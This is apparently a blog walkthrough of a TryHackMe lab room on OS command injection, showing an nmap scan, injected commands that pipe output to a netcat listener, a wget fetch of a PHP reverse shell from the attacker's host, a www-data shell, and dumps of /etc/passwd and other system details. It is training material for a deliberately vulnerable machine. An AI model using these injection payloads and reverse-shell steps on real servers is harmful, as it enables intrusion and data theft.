Tryhackme : Injection v4


injection

This post is Walkthrough of OS Command Injection. Demonstrate OS Command Injection and explain how to prevent it on your servers. So I thought this would be helpful for beginners.


https://tryhackme.com/room/injection

injection

Let’s get started by deploying the machine and since this is walkthrough machine we have some guide to solve the tasks in this machine and we have totally 5 task.



Nmap Scan

nmap -T4 -sT -sV -A -p-  10.10.245.41Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-10 10:10 IST
Stats: 0:01:11 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 12.41% done; ETC: 10:20 (0:08:14 remaining)
Warning: 10.10.245.41 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.245.41
Host is up (0.20s latency).
Not shown: 65516 closed ports
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 cc:44:30:82:07:0e:5d:1d:9a:2f:9e:c7:c5:58:78:c8 (RSA)
|   256 73:70:7a:38:45:76:cb:77:ee:bd:a7:a0:b7:33:72:1d (ECDSA)
|_  256 cc:3e:1a:08:c1:40:7a:3a:c4:52:65:3f:64:f0:c9:95 (ED25519)
80/tcp    open     http           Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: !!WIP!! - Directory Search
4210/tcp  filtered vrml-multi-use
7032/tcp  filtered unknown
8235/tcp  filtered unknown
12965/tcp filtered unknown
14320/tcp filtered unknown
15011/tcp filtered unknown
24363/tcp filtered unknown
25876/tcp filtered unknown
27643/tcp filtered unknown
40281/tcp filtered unknown
41894/tcp filtered unknown
43068/tcp filtered unknown
51584/tcp filtered unknown
62332/tcp filtered unknown
62491/tcp filtered unknown
63680/tcp filtered unknown
64394/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 866.77 seconds
          

we would find port 80 and 22 is open which means would be having webserver kind of apache running in the mahine.


injection

Since task1 does not require any answer or flag lets skip and task2 was about command injection and it had a description about it (beginners do read to get base knowlegde about it).

Blind Command Injection


we saw that it was running apache server in ubuntu operating system and lets look what does it had

injection

We had a intersecting input and it mentions directory search. We had source code already given by the room.when we look into it, we have a provide with valid user and it check whether user exist or not. Lets try with www-data, root, are some default user in ubuntu server.


injection

Lets break this input but generating a own payload, since this is grabbing user from /etc/passwd and verifying, we can execute command after that. let try listing the file and getting output through netcat.


root; ls -la | nc 10.8.19.249 4567nc -nvlp 4567
listening on [any] 4567 ...
connect to [10.8.19.249] from (UNKNOWN) [10.10.245.41] 57348
total 36
drwxr-x--- 4 www-data www-data 4096 Jun 10 03:26 .
drwxr-xr-x 3 root     root     4096 May 18 15:21 ..
drwxr-x--- 2 www-data www-data 4096 May 21 03:04 css
-rw-r----- 1 www-data www-data   17 May 22 13:14 drpepper.txt
-rw-r----- 1 www-data www-data 1723 May 26 01:52 evilshell.php
-rw-r----- 1 www-data www-data 2200 May 21 03:04 index.php
drwxr-x--- 2 www-data www-data 4096 May 21 03:04 js
-rw-r--r-- 1 www-data www-data 5493 Jun 10 02:52 shell.php
          

We found a malicious file called evilshell.php, lets check what potential it has to do.

injection

It was a webshell which was owned by www-data we would potential execute whatever command you want through input parameter. Lets use this to get a reverse shell with help of netcat.


injection
nc -nvlp 4567
listening on [any] 4567 ...
connect to [10.8.19.249] from (UNKNOWN) [10.10.245.41] 57350

But that did not properly work for me that output was returing to webserver and was display in webpage. I did not like that kind. so I thought to upload a php reverse shell.

we would download and setup a simple http server through python2 or python3 and use wget to download the file in machine, using


payload: root; wget http://10.8.19.249:8000/shell.phppython3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.245.41 - - [10/Jun/2020 10:40:47] "GET /shell.php HTTP/1.1" 200 -
          

once file has download would listen in some random port in attacker machine and send a get request in shell.php and BOOM you will get a reverse shell.

nc -nvlp 4567
listening on [any] 4567 ...
connect to [10.8.19.249] from (UNKNOWN) [10.10.245.41] 57354
Linux injection 4.15.0-101-generic #102-Ubuntu SMP Mon May 11 10:07:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 05:12:01 up  2:28,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Challenges

#1 Ping the box with 10 packets. What is this command (without IP address)?

; ping -c 10 0


#2 Redirect the box's Linux Kernel Version to a file on the web server. What is the Linux Kernel Version?

uname -a
4.15.0-101


#3 Enter "root" into the input and review the alert. What type of alert do you get?

success


#4 Enter “www-data” into the input and review the alert. What type of alert do you get?

success


#5 Enter your name into the input and review the alert. What type of alert do you get?

Error



Active Command Injection

#1 What strange text file is in the website root directory?

drwxr-x--- 4 www-data www-data 4096 Jun 10 03:26 .
drwxr-xr-x 3 root     root     4096 May 18 15:21 ..
drwxr-x--- 2 www-data www-data 4096 May 21 03:04 css
-rw-r----- 1 www-data www-data   17 May 22 13:14 drpepper.txt
-rw-r----- 1 www-data www-data 1723 May 26 01:52 evilshell.php
-rw-r----- 1 www-data www-data 2200 May 21 03:04 index.php
drwxr-x--- 2 www-data www-data 4096 May 21 03:04 js
-rw-r--r-- 1 www-data www-data 5493 Jun 10 02:52 shell.phpdrpepper.txt
        

#2 How many non-root/non-service/non-daemon users are there?

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologinAnswer: 0

#3 What user is this app running as?

ps aux | grep apache2
ps aux | grep apache2
root       942  0.0  1.6 327124  8176 ?        Ss   02:44   0:00 /usr/sbin/apache2 -k start
www-data   949  0.0  2.4 331980 11960 ?        S    02:44   0:00 /usr/sbin/apache2 -k start
www-data   950  0.0  2.1 331972 10624 ?        S    02:44   0:00 /usr/sbin/apache2 -k start
www-data   951  0.0  2.2 331976 11008 ?        S    02:44   0:00 /usr/sbin/apache2 -k start
www-data   952  0.0  2.2 331980 11100 ?        S    02:44   0:00 /usr/sbin/apache2 -k start
www-data   953  0.0  2.1 331980 10768 ?        S    02:44   0:00 /usr/sbin/apache2 -k start
www-data   961  0.0  2.5 331976 12428 ?        S    02:45   0:00 /usr/sbin/apache2 -k start
www-data   966  0.0  2.4 331980 11816 ?        S    02:45   0:00 /usr/sbin/apache2 -k start
www-data   967  0.0  2.3 331980 11388 ?        S    02:45   0:00 /usr/sbin/apache2 -k start
www-data  1843  0.0  2.3 331984 11520 ?        S    03:24   0:00 /usr/sbin/apache2 -k start
www-data  3244  0.0  2.6 331972 12884 ?        S    04:55   0:00 /usr/sbin/apache2 -k start
www-data  3386  0.0  0.2  11464  1036 pts/2    S+   05:16   0:00 grep apache2www-data

#4 What is the user’s shell set as?

cat /etc/passwd | grep www-data
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin/usr/sbin/nologin
        

#5 What version of Ubuntu is running?

lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 18.04.4 LTS
Release: 18.04
Codename: bionic18.04.4

#6 Print out the MOTD. What favorite beverage is shown?

cat /etc/update-motd.d/00-header
#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland 
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.[ -r /etc/lsb-release ] && . /etc/lsb-releaseif [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
 # Fall back to using the very slow lsb_release utility
 DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fiprintf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"DR PEPPER MAKES THE WORLD TASTE BETTER!DR PEPPER

Get the flag

Good work getting this far! You’ve completed the walkthrough, learned about command injection; what it is and how to test for it, and now it’s time to prove what you’ve got! Exploit the vulnerability and get the flag! For this, you can exploit either page. Both are vulnerable.


find / 2>/dev/null | grep flag.txt
/etc/flag.txtcat /etc/flag.txt
65f**************************4c4

This is was simple and easy room in Tryhackme, but great fro begineers for learning command injection, Thank you.